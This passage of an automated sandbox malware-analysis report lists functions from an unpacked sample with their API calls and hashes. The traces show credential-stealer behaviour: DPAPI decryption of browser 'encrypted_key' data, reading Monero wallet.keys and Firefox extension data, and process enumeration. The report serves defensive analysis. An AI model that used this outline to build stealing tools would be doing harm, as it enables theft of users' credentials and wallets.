                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: @$v10$v20
                            • API String ID: 2746078483-278772428
                            • Opcode ID: 9f3c226d366b7ba1801a2d001f7e36382aebb975947848bf3c37bfa221ad9915
                            • Instruction ID: 8758a702bf1d0d53bb91cd9665dfb7ab2f004d2bad77031c4952232e44e94815
                            • Opcode Fuzzy Hash: 9f3c226d366b7ba1801a2d001f7e36382aebb975947848bf3c37bfa221ad9915
                            • Instruction Fuzzy Hash: 84518D70A40208EFDB24EFA4DD96FED73B5AF44344F04A528F90A7B291DB706A49CB51
                            Function 00E4F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E61678,00E60D93), ref: 00E4F64C
                            • lstrlen.KERNEL32(00000000), ref: 00E4F66B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: a26392965ae9fa252df13bf5cd0c9f297c6e6c23d6860d67fbf131cb60bbdef0
                            • Instruction ID: 53e99b9e62e769e12b0e8e3aad965bed6ecb5ecd76bec4ff83674374feedd47f
                            • Opcode Fuzzy Hash: a26392965ae9fa252df13bf5cd0c9f297c6e6c23d6860d67fbf131cb60bbdef0
                            • Instruction Fuzzy Hash: 14514271D101089BCB04FBA0ED62DED73B9AF54341F089A78F81677191EE346A0CCBA2
                            Function 00E537B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 82a64908fd6c4d8de0a06c95fcc3de914d1a5ed645f27bd21211fa617a2c010a
                            • Instruction ID: f9aa454ee3eaafc367647df1fe6d171c11771ad62cbce12889a6bd3c27597646
                            • Opcode Fuzzy Hash: 82a64908fd6c4d8de0a06c95fcc3de914d1a5ed645f27bd21211fa617a2c010a
                            • Instruction Fuzzy Hash: 6A417571D002099FCF18EFB4D955AEEB7B8AF44345F049928F81677281EB70AA49CF91
                            Function 00E4A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E4A489
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A23F
                              • Part of subcall function 00E4A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E44F3E,00000000,?), ref: 00E4A251
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A27A
                              • Part of subcall function 00E4A210: LocalFree.KERNEL32(?,?,?,?,00E44F3E,00000000,?), ref: 00E4A28F
                              • Part of subcall function 00E4A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E4A2D4
                              • Part of subcall function 00E4A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E4A2F3
                              • Part of subcall function 00E4A2B0: LocalFree.KERNEL32(?), ref: 00E4A323
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 72174162343a8f44e65d45ed3e3c9ec578af7e327a691e2cd70cf270bc4c2477
                            • Instruction ID: 37cd53356b595283fbd3f6bc4bad90e80df173179a8e8d68c0b49a6511dc902c
                            • Opcode Fuzzy Hash: 72174162343a8f44e65d45ed3e3c9ec578af7e327a691e2cd70cf270bc4c2477
                            • Instruction Fuzzy Hash: 333130B6D40209ABDF04DFA4FD45AEEB7B8AB58304F085568E901B7241E7349A04CBA2
                            Function 00E58810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E605BF), ref: 00E5885A
                            • Process32First.KERNEL32(?,00000128), ref: 00E5886E
                            • Process32Next.KERNEL32(?,00000128), ref: 00E58883
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • CloseHandle.KERNEL32(?), ref: 00E588F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 49f71f3f1cc7515a6c008eaae2de9ff65b039cf64ff2b936bae476036096f439
                            • Instruction ID: d8895c375e38aabc8d412060a287d1eb5528d327e288d84679da2ce0928e3f7e
                            • Opcode Fuzzy Hash: 49f71f3f1cc7515a6c008eaae2de9ff65b039cf64ff2b936bae476036096f439
                            • Instruction Fuzzy Hash: 223171719012189BCB64DF54DD51FEEF3B8FB44701F505AA9F50AB2290DB306A48CFA1
                            Function 00EBFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EBFE13
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EBFE2C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value___vcrt_
                            • String ID:
                            • API String ID: 1426506684-0
                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction ID: 61778e17d1d89935569712e93b8bdebf8109624ece5ff2c55141d739c5e224c2
                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction Fuzzy Hash: B901B132609761AEF63526745DCAEB72694EB027B9730533EF616A41F3EF928C429240
                            Function 00E57B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60DE8,00000000,?), ref: 00E57B40
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57B47
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00E60DE8,00000000,?), ref: 00E57B54
                            • wsprintfA.USER32 ref: 00E57B83
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 1b3c287adf65e90400ee54a1671aceb08c06e118da5d19d0a0a6e67712299a2b
                            • Instruction ID: 65098db9b4a0f75f4e9bfe7981b3b5635975088418aec8162639384e6b6aab6f
                            • Opcode Fuzzy Hash: 1b3c287adf65e90400ee54a1671aceb08c06e118da5d19d0a0a6e67712299a2b
                            • Instruction Fuzzy Hash: A0112AB2904218ABCB24DBC9DD45BFEF7B9EB4CB11F10411AF615A2284D6395980C7B0
                            Function 00E5CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00E5CA7E
                              • Part of subcall function 00E5C2A0: __amsg_exit.LIBCMT ref: 00E5C2B0
                            • __getptd.LIBCMT ref: 00E5CA95
                            • __amsg_exit.LIBCMT ref: 00E5CAA3
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00E5CAC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 79a826997d762ad51c31ea4a6544085f519852cc41d93cca42060236cd61e678
                            • Instruction ID: 136853a216a1688721e8792800172e5d23026ca60b2f44e6b039fc9fe906b393
                            • Opcode Fuzzy Hash: 79a826997d762ad51c31ea4a6544085f519852cc41d93cca42060236cd61e678
                            • Instruction Fuzzy Hash: 32F096319447149FD620FBB8581375E37E0AF00757F30394AFD06B61D3CB645948CA96
                            Function 00EC04D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Catch
                            • String ID: MOC$RCC
                            • API String ID: 78271584-2084237596
                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction ID: 7856c120bd3b1458e7e3fd82fd2e745e60d21e248b582fe8673197fca9d8f300
                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction Fuzzy Hash: 78414771900209EFCF26DF98DE81FEEBBB5AF48308F189199F91476211D2369A61DF50
                            Function 00EC36CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: T8
                            • API String ID: 0-1243456643
                            • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                            • Instruction ID: 302259893e839c4512510cd6b4e69b5ddecf2f0fb130a413937b317f8446b30e
                            • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                            • Instruction Fuzzy Hash: B42192F1600205BF9B10AF71CA81E6B77E9AF10368710951EF926B7551D733EE028B91
                            Function 00E55190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E551CA
